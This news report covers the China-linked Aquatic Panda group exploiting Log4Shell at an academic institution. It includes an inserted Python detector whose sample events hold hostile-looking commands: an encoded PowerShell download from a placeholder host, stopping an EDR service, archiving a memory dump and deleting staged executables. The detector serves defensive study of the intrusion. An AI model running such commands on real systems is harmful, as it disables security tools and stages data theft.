30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw

A China-linked cyber-espionage group known as Aquatic Panda has recently been spotted exploiting the Log4Shell vulnerability to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) to gain access to a VMware Horizon instance that used the vulnerable Log4j library at an unnamed academic institution.

The purpose of the attack is unknown because the intrusion was thwarted.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor first performed connectivity checks, issuing DNS lookups for a subdomain from the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on the Windows host under the Apache Tomcat service in an attempt to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used WinRAR to compress a memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\Temp\ directories to cover their tracks.
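The intrusion chain described above (a shell spawned under Tomcat, DNS connectivity checks, an attempt to stop an EDR service, a Base64-encoded PowerShell download, a memory dump packed with WinRAR, and cleanup of staged executables) maps onto a handful of checks over process-creation telemetry. The following is an added example, not CrowdStrike's or the article's code, that runs such checks over constructed, hypothetical EDR-style events. The event field names, host names, file paths, the EDR service name and the staging URL are all placeholders chosen for this example, and the rule set is illustrative rather than any vendor's detection logic.

```python
"""Toy detector for the behaviours described in the article.

Runs over constructed process-creation events (not real telemetry) and
reports which hosts trip which rules, and which hosts trip enough rules
to look like a hands-on intrusion rather than an isolated oddity.
"""
import base64
import re
from pathlib import PureWindowsPath

# Constructed: the encoded PowerShell payload is built here from plaintext so
# the sample is reproducible. -EncodedCommand expects Base64 of UTF-16LE text.
ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-WebRequest -Uri http://staging.invalid/tool.bin "
    "-OutFile C:\\ProgramData\\tool.bin".encode("utf-16-le")
).decode("ascii")

# Constructed events in a generic EDR-like shape; field names are this
# example's own, not any product's schema. Paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"host": "horizon-01",
     "parent_image": r"C:\Horizon\Tomcat\bin\tomcat_service.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c nslookup check.placeholder.invalid"},
    {"host": "horizon-01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "command_line": "sc stop ExampleEdrSvc"},
    {"host": "horizon-01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"host": "horizon-01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "command_line": r"WinRAR.exe a -r C:\ProgramData\out.rar C:\Windows\Temp\mem.dmp"},
    {"host": "horizon-01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c del /q C:\ProgramData\*.exe C:\Windows\Temp\*.exe"},
    # Benign control: an interactive PowerShell session on a workstation.
    {"host": "ws-12",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Date"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "nslookup.exe", "sh.exe", "bash.exe"}
ARCHIVERS = {"winrar.exe", "rar.exe", "7z.exe"}
EDR_SERVICE_NAMES = {"exampleedrsvc"}  # placeholder: fill with the service names actually deployed
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|certutil", re.I)
SERVICE_CTL_RE = re.compile(r"\b(sc(\.exe)?\s+(stop|delete|query)|stop-service|net\s+stop)\b")
DELETE_RE = re.compile(r"\b(del|erase|remove-item|rm)\b")


def basename(path):
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Return the list of rule names one event trips (empty for benign events)."""
    hits = []
    parent = ev["parent_image"].lower()
    image = basename(ev["image"])
    cmd_l = ev["command_line"].lower()
    if "tomcat" in parent and image in SHELLS:
        hits.append("tomcat_spawns_shell")           # web-app process launching a shell
    decoded = decode_encoded_command(ev["command_line"])
    if decoded is not None:
        hits.append("encoded_powershell")
        if DOWNLOAD_RE.search(decoded):
            hits.append("encoded_download")          # payload fetches something from the network
    if SERVICE_CTL_RE.search(cmd_l) and any(s in cmd_l for s in EDR_SERVICE_NAMES):
        hits.append("edr_service_tamper")            # discovery/stop of the EDR service
    if image in ARCHIVERS and ".dmp" in cmd_l:
        hits.append("memory_dump_archived")          # dump packed for exfiltration
    if DELETE_RE.search(cmd_l) and re.search(r"programdata|windows\\temp", cmd_l) and ".exe" in cmd_l:
        hits.append("staging_cleanup")               # executables wiped from staging dirs
    return hits


def analyze(events):
    """Map each triggered rule name to the hosts that triggered it."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev["host"])
    return findings


def hosts_with_chain(events, min_rules=3):
    """Hosts tripping at least min_rules distinct rules: triage these first."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(classify(ev))
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for rule, hosts in analyze(SAMPLE_EVENTS).items():
        print(f"{rule:22s} {sorted(set(hosts))}")
    print("probable hands-on intrusion:", hosts_with_chain(SAMPLE_EVENTS))
```

Any single rule here has benign hits in a real estate (administrators do stop services and run encoded commands), which is why `hosts_with_chain` counts distinct behaviours per host: the article's intrusion was recognisable because several of these steps came from the same Tomcat-rooted process tree within a short window, and that correlation, not any one command, is what an analyst should alert on.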

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.
